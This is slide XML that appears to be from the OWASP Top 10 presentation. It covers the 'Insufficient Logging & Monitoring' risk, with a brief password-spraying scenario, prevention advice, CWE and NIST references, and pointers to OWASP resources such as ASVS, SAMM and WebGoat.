            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>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55940555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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability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000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>This issue is detectable by the use of scanners such as retire.js and header inspection, but verifying if it is exploitable requires an attack of some description.</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An attacker uses scans for users using a common password. He can take over all accounts using this password. For all other users this scan leaves only 1 false login behind. After some days this may be repeated with a different password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Calibri"/>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Insufficient Logging &amp; Monitoring?</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Insufficient logging, detection, monitoring and active response occurs any time:</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Auditable events, such as logins, failed logins, and high value transactions are not logged.</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Logs of applications and APIs are not monitored for suspicious activity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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Alerting thresholds and response escalation as per the risk of the data held by the application is not in place or effective.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For larger and high performing organizations, the lack of active response, such as real time alerting and response activities such as blocking automated attacks on web applications and particularly APIs would place the organization at risk from extended compromise. The response does not necessarily need to be visible to the attacker, only that the application and associated infrastructure, frameworks, service layers, etc. can detect and alert humans or tools to respond in near real time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">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4"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - Implement Logging and Intrusion Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard – V8 Logging and Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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Testing Guide - Testing for Detailed Error Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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Cheat Sheet - Logging</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6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7"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">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8"/>
              </a:rPr>
              <a:t>CWE-223 Omission of Security-relevant Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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9"/>
              </a:rPr>
              <a:t>CWE-778 Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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This?</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As per the risk of the data stored or processed by the application:</a:t>
            </a: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all login, access control failures, input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts, and held for sufficient time to allow delayed forensic analysis.</a:t>
            </a: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Ensure high value transactions have an audit trail with integrity controls to prevent tampering or deletion, such as append only database tables or similar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-1714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Establish effective monitoring and alerting such that suspicious activities are detected and responded within acceptable time periods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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Establish or adopt an incident response and recovery plan, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are commercial and open source application protection frameworks such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, web application firewalls such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>mod_security with the OWASP Core Rule Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, and log correlation software such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>ELK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> with custom dashboards and alerting. Penetration testing and scans by DAST tools (such as OWASP ZAP) should always trigger alerts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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a:t>Insufficient</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Logging &amp; Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12857260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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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tx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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="12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Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>This issue is included in the Top 10 based on an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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Most successful attacks start with vulnerability probing. Allowing such probes to continue can raise the likelihood of successful exploit to nearly 100%. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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6443815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Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0"/>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="none" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>resources that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>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rPr>
                        <a:t>There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="2971800"/>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To produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0"/>
                <a:t>secure</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t> web application, you must define what secure means for that application. OWASP recommends you use the OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId7"/>
                </a:rPr>
                <a:t>Application Security Verification Standard (ASVS)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>, as a guide for setting the security requirements for your application(s). If you’re outsourcing, consider the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>OWASP Secure Software Contract Annex</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0"/>
                <a:t>NB</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>: T</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t>he annex is for US contract law, so please consult qualified legal advice before using the sample annex. </a:t>
              </a:r>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dirty="0"/>
                <a:t>Application Security Requirements</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="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baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Rather than retrofitting security into your applications and APIs, it is far more cost effective to design the security in from the start. OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t> and the</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>OWASP Developer’s Guide</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t> as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>good starting points for guidance on how to design security in from the beginning. </a:t>
              </a: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a:t>Application Security Architecture</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRP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t>Building strong and usable security controls is difficult. Using</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
                <a:t> a</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t> set of standard security controls radically simplifies the development of secure applications and APIs. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Many modern frameworks now come with standard and effective security controls for authorization, validation, CSRF, etc.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>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Standard Security Controls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"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To improve the process your organization follows when building applications and APIs, OWASP recommends the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>. This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization. </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Secure Development Lifecycle</a:t>
              </a:r>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The </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId12"/>
                </a:rPr>
                <a:t>OWASP Education Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t> provides training materials to help educate developers on web application security. For hands-on learning about vulnerabilities, try </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1">
                  <a:hlinkClick r:id="rId13"/>
                </a:rPr>
                <a:t>WebGoat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId14"/>
                </a:rPr>
                <a:t>WebGoat.NET</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>,  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId15"/>
                </a:rPr>
                <a:t>OWASP NodeJS Goat</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId16"/>
                </a:rPr>
                <a:t>OWASP Juice Shop Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0"/>
                <a:t> or the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0">
                  <a:hlinkClick r:id="rId17"/>
                </a:rPr>
                <a:t>OWASP Broken Web Applications Project</a:t>
